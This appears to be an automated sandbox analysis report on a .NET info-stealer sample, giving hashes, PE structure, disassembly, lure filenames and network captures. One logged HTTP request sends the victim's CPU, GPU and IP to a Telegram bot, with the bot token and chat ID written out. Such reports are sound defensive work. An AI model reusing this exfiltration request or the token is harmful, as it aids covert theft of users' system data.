                        3b5074b1b5d032e5620f69f9f700ff0eOwNqANDnRy.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        xYWm6BV3NZ.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        r1gnvYRnsz.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        price.pdf.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        Swift mesaj#U0131 4.02.2022.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        BjEwXjK71p.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        TNT Shipping Documents PDF.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        Jwd5H8TOWY.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        2S8msvSWxQ.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        Advised Swift mesaj#U0131.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        BANK SLIP.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        New Order_____pdf.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        WfBayGk51Z.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        comprobante de pago.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        XSBje3XPsU.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        LZetStOCHC.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        LmgBDW22ld.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        MIX1h1_20220204-214440.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        Genshin.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        EbEX5Miwah.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        No context
                        Process:C:\Users\user\Desktop\xYWm6BV3NZ.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):939
                        Entropy (8bit):5.355190411702703
                        Encrypted:false
                        SSDEEP:24:MLasXE4qpE4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MNH2HKXwYHKhQnoPtHoxHhAHKzva
                        MD5:09DD7EF573E761A337102117E0DD40FC
                        SHA1:211E8216D26DDCF6F64506501A3B32E4B27350B0
                        SHA-256:4611C046021CC6E9B0C8D49996E1431310EE1F9485494D574D738BEFDC2515F3
                        SHA-512:2FB68CB4CBEA741563E0D6B6BDDB874F824818925F64B1F07DB01EA29CB96BA4388446E16E12ADE3AFC2604E7A899D6D2FBC79528D782FFE3CA2B3739C53E29E
                        Malicious:true
                        Reputation:moderate, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):4.572059922522141
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:xYWm6BV3NZ.exe
                        File size:6144
                        MD5:166c72239b76c7f2dcd5cb02138adc42
                        SHA1:738654027847e49909f1180c147f79c80acb947f
                        SHA256:013f6b8faad5ceefe26e0817e770031e6df82da64e1b38dc4299b9bf55ba731a
                        SHA512:da610ae7ecebe6b8946d6cd35ca0b041fa13b5415e55f84f44f9d42e97de37f7941274f70532b0cc8622219eeeae8c22a43aa7c79a7832640f5b7bf34d6cf677
                        SSDEEP:96:EIx6qHc9lXjeBJhy0QNa/lBk5PtRAkVczNt:EIx/H4iJtQ15PDM
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=..........."...0..............-... ...@....@.. ....................................`................................
                        Icon Hash:00828e8e8686b000
                        Entrypoint:0x402dde
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows cui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                        Time Stamp:0xEC3D810A [Sat Aug 6 07:21:46 2095 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2d8a0x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x59c.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x2ce40x38.text
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000xde40xe00False0.552455357143data5.28320751844IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc0x40000x59c0x600False0.41015625data4.03491595502IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x60000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountry
                        RT_VERSION0x40900x30cdata
                        RT_MANIFEST0x43ac0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        DLLImport
                        mscoree.dll_CorExeMain
                        DescriptionData
                        Translation0x0000 0x04b0
                        LegalCopyrightCopyright 2021
                        Assembly Version1.0.0.0
                        InternalNameAmongus.exe
                        FileVersion1.0.0.0
                        CompanyName
                        LegalTrademarks
                        Comments
                        ProductNameAmongus
                        ProductVersion1.0.0.0
                        FileDescriptionAmongus
                        OriginalFilenameAmongus.exe
                        TimestampSource PortDest PortSource IPDest IP
                        Feb 7, 2022 15:07:13.395721912 CET4975780192.168.2.6208.95.112.1
                        Feb 7, 2022 15:07:13.425086975 CET8049757208.95.112.1192.168.2.6
                        Feb 7, 2022 15:07:13.425318003 CET4975780192.168.2.6208.95.112.1
                        Feb 7, 2022 15:07:13.426408052 CET4975780192.168.2.6208.95.112.1
                        Feb 7, 2022 15:07:13.456212044 CET8049757208.95.112.1192.168.2.6
                        Feb 7, 2022 15:07:13.494551897 CET49758443192.168.2.6149.154.167.220
                        Feb 7, 2022 15:07:13.494610071 CET44349758149.154.167.220192.168.2.6
                        Feb 7, 2022 15:07:13.494690895 CET49758443192.168.2.6149.154.167.220
                        Feb 7, 2022 15:07:13.609014988 CET4975780192.168.2.6208.95.112.1
                        Feb 7, 2022 15:07:13.824841022 CET49758443192.168.2.6149.154.167.220
                        Feb 7, 2022 15:07:13.824876070 CET44349758149.154.167.220192.168.2.6
                        Feb 7, 2022 15:07:13.885582924 CET44349758149.154.167.220192.168.2.6
                        Feb 7, 2022 15:07:13.885718107 CET49758443192.168.2.6149.154.167.220
                        Feb 7, 2022 15:07:13.890818119 CET49758443192.168.2.6149.154.167.220
                        Feb 7, 2022 15:07:13.890841961 CET44349758149.154.167.220192.168.2.6
                        Feb 7, 2022 15:07:13.891026020 CET44349758149.154.167.220192.168.2.6
                        Feb 7, 2022 15:07:13.999644995 CET49758443192.168.2.6149.154.167.220
                        Feb 7, 2022 15:07:14.259805918 CET49758443192.168.2.6149.154.167.220
                        Feb 7, 2022 15:07:14.301883936 CET44349758149.154.167.220192.168.2.6
                        Feb 7, 2022 15:07:14.449168921 CET44349758149.154.167.220192.168.2.6
                        Feb 7, 2022 15:07:14.449230909 CET44349758149.154.167.220192.168.2.6
                        Feb 7, 2022 15:07:14.449378014 CET49758443192.168.2.6149.154.167.220
                        Feb 7, 2022 15:07:14.455024004 CET49758443192.168.2.6149.154.167.220
                        Feb 7, 2022 15:07:14.671432972 CET4975780192.168.2.6208.95.112.1
                        TimestampSource PortDest PortSource IPDest IP
                        Feb 7, 2022 15:07:13.329943895 CET4944853192.168.2.68.8.8.8
                        Feb 7, 2022 15:07:13.348685026 CET53494488.8.8.8192.168.2.6
                        Feb 7, 2022 15:07:13.474479914 CET6034253192.168.2.68.8.8.8
                        Feb 7, 2022 15:07:13.492578030 CET53603428.8.8.8192.168.2.6
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Feb 7, 2022 15:07:13.329943895 CET192.168.2.68.8.8.80xe4b9Standard query (0)ip-api.comA (IP address)IN (0x0001)
                        Feb 7, 2022 15:07:13.474479914 CET192.168.2.68.8.8.80xffa9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Feb 7, 2022 15:07:13.348685026 CET8.8.8.8192.168.2.60xe4b9No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)
                        Feb 7, 2022 15:07:13.492578030 CET8.8.8.8192.168.2.60xffa9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                        • api.telegram.org
                        • ip-api.com
                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.649758149.154.167.220443C:\Users\user\Desktop\xYWm6BV3NZ.exe
                        TimestampkBytes transferredDirectionData


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.649757208.95.112.180C:\Users\user\Desktop\xYWm6BV3NZ.exe
                        TimestampkBytes transferredDirectionData
                        Feb 7, 2022 15:07:13.426408052 CET872OUTGET /line?fields=query HTTP/1.1
                        Host: ip-api.com
                        Connection: Keep-Alive
                        Feb 7, 2022 15:07:13.456212044 CET872INHTTP/1.1 200 OK
                        Date: Mon, 07 Feb 2022 14:07:12 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 15
                        Access-Control-Allow-Origin: *
                        X-Ttl: 60
                        X-Rl: 44
                        Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 36 31 0a
                        Data Ascii: 102.129.143.61


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.649758149.154.167.220443C:\Users\user\Desktop\xYWm6BV3NZ.exe
                        TimestampkBytes transferredDirectionData
                        2022-02-07 14:07:14 UTC0OUTGET /bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=1704933594&text=CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%202F7CW8A1%0AIP:%20102.129.143.61 HTTP/1.1
                        Host: api.telegram.org
                        Connection: Keep-Alive
                        2022-02-07 14:07:14 UTC0INHTTP/1.1 200 OK
                        Server: nginx/1.18.0
                        Date: Mon, 07 Feb 2022 14:07:14 GMT
                        Content-Type: application/json
                        Content-Length: 412
                        Connection: close
                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                        2022-02-07 14:07:14 UTC0INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 35 35 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 32 30 32 36 35 35 32 35 37 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 48 41 32 35 36 20 5b 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61 5d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 68 61 32 35 36 4d 69 6e 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 37 30 34 39 33 33 35 39 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 56 50 53 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 75 69 6c 64 73 31 31 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64
                        Data Ascii: {"ok":true,"result":{"message_id":65507,"from":{"id":2026552572,"is_bot":true,"first_name":"SHA256 [\u041e\u0422\u0421\u0422\u0423\u041a]","username":"Sha256Miner_bot"},"chat":{"id":1704933594,"first_name":"VPS","username":"builds111","type":"private"},"d


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:15:07:09
                        Start date:07/02/2022
                        Path:C:\Users\user\Desktop\xYWm6BV3NZ.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\xYWm6BV3NZ.exe"
                        Imagebase:0xc20000
                        File size:6144 bytes
                        MD5 hash:166C72239B76C7F2DCD5CB02138ADC42
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:low

                        Target ID:1
                        Start time:15:07:10
                        Start date:07/02/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff61de10000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Reset < >

                          Execution Graph

                          Execution Coverage:17.1%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:6
                          Total number of Limit Nodes:0
                          execution_graph 8957 14d1d70 8958 14d1d8e 8957->8958 8961 14d0ef0 8958->8961 8960 14d1dc5 8962 14d3890 LoadLibraryA 8961->8962 8964 14d3989 8962->8964

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1304 14da578-14da593 1305 14da599-14da5a0 1304->1305 1306 14da7c5-14da7ed 1304->1306 1307 14da5ac-14da5cb 1305->1307 1308 14da5a2-14da5ab 1305->1308 1320 14da7f4-14da90c 1306->1320 1309 14da7b8-14da7c4 1307->1309 1310 14da5d1-14da5f2 1307->1310 1312 14da5fa-14da628 1310->1312 1313 14da5f4-14da5f8 1310->1313 1317 14da62d-14da6b3 call 14d97b0 1312->1317 1313->1312 1314 14da62a 1313->1314 1314->1317 1375 14da6b5 call 14da568 1317->1375 1376 14da6b5 call 14da578 1317->1376 1377 14da6b5 call 14d3fe5 1317->1377 1378 14da6b5 call 14da952 1317->1378 1342 14da90e-14da914 1320->1342 1343 14da915-14da960 1320->1343 1332 14da6bb-14da6c9 call 14d9cc0 1336 14da728-14da72c 1332->1336 1337 14da6cb-14da6cd 1332->1337 1339 14da76f-14da776 1336->1339 1340 14da72e-14da73b 1336->1340 1341 14da711-14da720 1337->1341 1344 14da778-14da77f 1339->1344 1345 14da78a-14da78e 1339->1345 1347 14da73d-14da742 1340->1347 1348 14da74f-14da761 1340->1348 1341->1336 1346 14da722 1341->1346 1342->1343 1365 14da96a-14da96e 1343->1365 1366 14da962 1343->1366 1344->1345 1349 14da781 1344->1349 1353 14da7b0-14da7b5 1345->1353 1354 14da790-14da797 1345->1354 1351 14da6cf-14da6db 1346->1351 1352 14da724-14da726 1346->1352 1347->1348 1356 14da744-14da74d 1347->1356 1348->1353 1362 14da763-14da76d 1348->1362 1349->1345 1351->1320 1358 14da6e1-14da710 1351->1358 1352->1336 1352->1351 1353->1309 1354->1353 1357 14da799-14da7af 1354->1357 1356->1353 1358->1341 1362->1353 1368 14da98a 1365->1368 1369 14da970-14da97c 1365->1369 1366->1365 1373 14da98b 1368->1373 1371 14da97e-14da981 1369->1371 1372 14da984 1369->1372 1371->1372 1372->1368 1373->1373 1375->1332 1376->1332 1377->1332 1378->1332
                          Memory Dump Source
                          • Source File: 00000000.00000002.367664983.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_14d0000_xYWm6BV3NZ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a6c50d309c284e098191f9d94d77ae548fe408a9474cfeafb9b1efcce6127557
                          • Instruction ID: 433e1175980e67199d343d68e61f31285abbea054468aeed9476e47bd3599846
                          • Opcode Fuzzy Hash: a6c50d309c284e098191f9d94d77ae548fe408a9474cfeafb9b1efcce6127557
                          • Instruction Fuzzy Hash: CBD13C74E002098FCF14DFA8C494AAEBBF6FF48314F25855AE515AB361DB34A946CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1477 14d6388-14d63ee 1479 14d6438-14d643a 1477->1479 1480 14d63f0-14d63fb 1477->1480 1482 14d643c-14d6455 1479->1482 1480->1479 1481 14d63fd-14d6409 1480->1481 1483 14d642c-14d6436 1481->1483 1484 14d640b-14d6415 1481->1484 1489 14d6457-14d6463 1482->1489 1490 14d64a1-14d64a3 1482->1490 1483->1482 1485 14d6419-14d6428 1484->1485 1486 14d6417 1484->1486 1485->1485 1488 14d642a 1485->1488 1486->1485 1488->1483 1489->1490 1492 14d6465-14d6471 1489->1492 1491 14d64a5-14d64fd 1490->1491 1501 14d64ff-14d650a 1491->1501 1502 14d6547-14d6549 1491->1502 1493 14d6494-14d649f 1492->1493 1494 14d6473-14d647d 1492->1494 1493->1491 1496 14d647f 1494->1496 1497 14d6481-14d6490 1494->1497 1496->1497 1497->1497 1498 14d6492 1497->1498 1498->1493 1501->1502 1503 14d650c-14d6518 1501->1503 1504 14d654b-14d6563 1502->1504 1505 14d653b-14d6545 1503->1505 1506 14d651a-14d6524 1503->1506 1510 14d65ad-14d65af 1504->1510 1511 14d6565-14d6570 1504->1511 1505->1504 1508 14d6528-14d6537 1506->1508 1509 14d6526 1506->1509 1508->1508 1512 14d6539 1508->1512 1509->1508 1514 14d65b1-14d6602 1510->1514 1511->1510 1513 14d6572-14d657e 1511->1513 1512->1505 1515 14d65a1-14d65ab 1513->1515 1516 14d6580-14d658a 1513->1516 1522 14d6608-14d6616 1514->1522 1515->1514 1517 14d658c 1516->1517 1518 14d658e-14d659d 1516->1518 1517->1518 1518->1518 1520 14d659f 1518->1520 1520->1515 1523 14d661f-14d667f 1522->1523 1524 14d6618-14d661e 1522->1524 1531 14d668f-14d6693 1523->1531 1532 14d6681-14d6685 1523->1532 1524->1523 1533 14d6695-14d6699 1531->1533 1534 14d66a3-14d66a7 1531->1534 1532->1531 1535 14d6687 1532->1535 1533->1534 1536 14d669b 1533->1536 1537 14d66a9-14d66ad 1534->1537 1538 14d66b7-14d66bb 1534->1538 1535->1531 1536->1534 1537->1538 1539 14d66af 1537->1539 1540 14d66bd-14d66c1 1538->1540 1541 14d66cb-14d66cf 1538->1541 1539->1538 1540->1541 1542 14d66c3 1540->1542 1543 14d66df-14d66e3 1541->1543 1544 14d66d1-14d66d5 1541->1544 1542->1541 1545 14d66e5-14d66e9 1543->1545 1546 14d66f3-14d66f7 1543->1546 1544->1543 1547 14d66d7 1544->1547 1545->1546 1548 14d66eb 1545->1548 1549 14d66f9-14d66fd 1546->1549 1550 14d6707 1546->1550 1547->1543 1548->1546 1549->1550 1551 14d66ff 1549->1551 1552 14d6708 1550->1552 1551->1550 1552->1552
                          Memory Dump Source
                          • Source File: 00000000.00000002.367664983.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_14d0000_xYWm6BV3NZ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9dba9cdbaf69ced9fb5e818bbabe5ea6d681d9b43046bfd908da943fcfe6c2e2
                          • Instruction ID: 3fc36c3fbb002fefd45052a80e90c07af21c7227a2aa398986656f66e1de742a
                          • Opcode Fuzzy Hash: 9dba9cdbaf69ced9fb5e818bbabe5ea6d681d9b43046bfd908da943fcfe6c2e2
                          • Instruction Fuzzy Hash: 84B15170E002198FDF14CFA9D9A47EEBBF2AF88314F15812AD419A73A4DB749845CF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1719 14d6c58-14d6cbe 1721 14d6d08-14d6d0a 1719->1721 1722 14d6cc0-14d6ccb 1719->1722 1723 14d6d0c-14d6d25 1721->1723 1722->1721 1724 14d6ccd-14d6cd9 1722->1724 1731 14d6d27-14d6d33 1723->1731 1732 14d6d71-14d6d73 1723->1732 1725 14d6cfc-14d6d06 1724->1725 1726 14d6cdb-14d6ce5 1724->1726 1725->1723 1727 14d6ce9-14d6cf8 1726->1727 1728 14d6ce7 1726->1728 1727->1727 1730 14d6cfa 1727->1730 1728->1727 1730->1725 1731->1732 1733 14d6d35-14d6d41 1731->1733 1734 14d6d75-14d6d8d 1732->1734 1735 14d6d64-14d6d6f 1733->1735 1736 14d6d43-14d6d4d 1733->1736 1740 14d6d8f-14d6d9a 1734->1740 1741 14d6dd7-14d6dd9 1734->1741 1735->1734 1738 14d6d4f 1736->1738 1739 14d6d51-14d6d60 1736->1739 1738->1739 1739->1739 1742 14d6d62 1739->1742 1740->1741 1744 14d6d9c-14d6da8 1740->1744 1743 14d6ddb-14d6df3 1741->1743 1742->1735 1751 14d6e3d-14d6e3f 1743->1751 1752 14d6df5-14d6e00 1743->1752 1745 14d6dcb-14d6dd5 1744->1745 1746 14d6daa-14d6db4 1744->1746 1745->1743 1747 14d6db8-14d6dc7 1746->1747 1748 14d6db6 1746->1748 1747->1747 1750 14d6dc9 1747->1750 1748->1747 1750->1745 1753 14d6e41-14d6eb4 1751->1753 1752->1751 1754 14d6e02-14d6e0e 1752->1754 1763 14d6eba-14d6ec8 1753->1763 1755 14d6e31-14d6e3b 1754->1755 1756 14d6e10-14d6e1a 1754->1756 1755->1753 1758 14d6e1c 1756->1758 1759 14d6e1e-14d6e2d 1756->1759 1758->1759 1759->1759 1760 14d6e2f 1759->1760 1760->1755 1764 14d6eca-14d6ed0 1763->1764 1765 14d6ed1-14d6f31 1763->1765 1764->1765 1772 14d6f41-14d6f45 1765->1772 1773 14d6f33-14d6f37 1765->1773 1775 14d6f55-14d6f59 1772->1775 1776 14d6f47-14d6f4b 1772->1776 1773->1772 1774 14d6f39 1773->1774 1774->1772 1777 14d6f69-14d6f6d 1775->1777 1778 14d6f5b-14d6f5f 1775->1778 1776->1775 1779 14d6f4d 1776->1779 1781 14d6f7d-14d6f81 1777->1781 1782 14d6f6f-14d6f73 1777->1782 1778->1777 1780 14d6f61 1778->1780 1779->1775 1780->1777 1784 14d6f91-14d6f95 1781->1784 1785 14d6f83-14d6f87 1781->1785 1782->1781 1783 14d6f75 1782->1783 1783->1781 1787 14d6fa5 1784->1787 1788 14d6f97-14d6f9b 1784->1788 1785->1784 1786 14d6f89 1785->1786 1786->1784 1790 14d6fa6 1787->1790 1788->1787 1789 14d6f9d 1788->1789 1789->1787 1790->1790
                          Memory Dump Source
                          • Source File: 00000000.00000002.367664983.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_14d0000_xYWm6BV3NZ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba0acabdc84a7d1d80c9f99ba35dfead35e203aa8990928c70d31fa2c76b460e
                          • Instruction ID: f78cf006318d85981c45a8e7a7bfe798e90f9c93b8c16f8e7d3cb71a3fc08eac
                          • Opcode Fuzzy Hash: ba0acabdc84a7d1d80c9f99ba35dfead35e203aa8990928c70d31fa2c76b460e
                          • Instruction Fuzzy Hash: B8B16170E006098FDF10CFA9D8A57EEBBF2AF48314F15812AE415E7364DB749886CB41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 14d3885-14d38e7 2 14d38e9-14d390e 0->2 3 14d393b-14d3987 LoadLibraryA 0->3 2->3 8 14d3910-14d3912 2->8 6 14d3989-14d398f 3->6 7 14d3990-14d39c1 3->7 6->7 15 14d39d1 7->15 16 14d39c3-14d39c7 7->16 9 14d3935-14d3938 8->9 10 14d3914-14d391e 8->10 9->3 12 14d3920 10->12 13 14d3922-14d3931 10->13 12->13 13->13 17 14d3933 13->17 19 14d39d2 15->19 16->15 18 14d39c9 16->18 17->9 18->15 19->19
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.367664983.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_14d0000_xYWm6BV3NZ.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
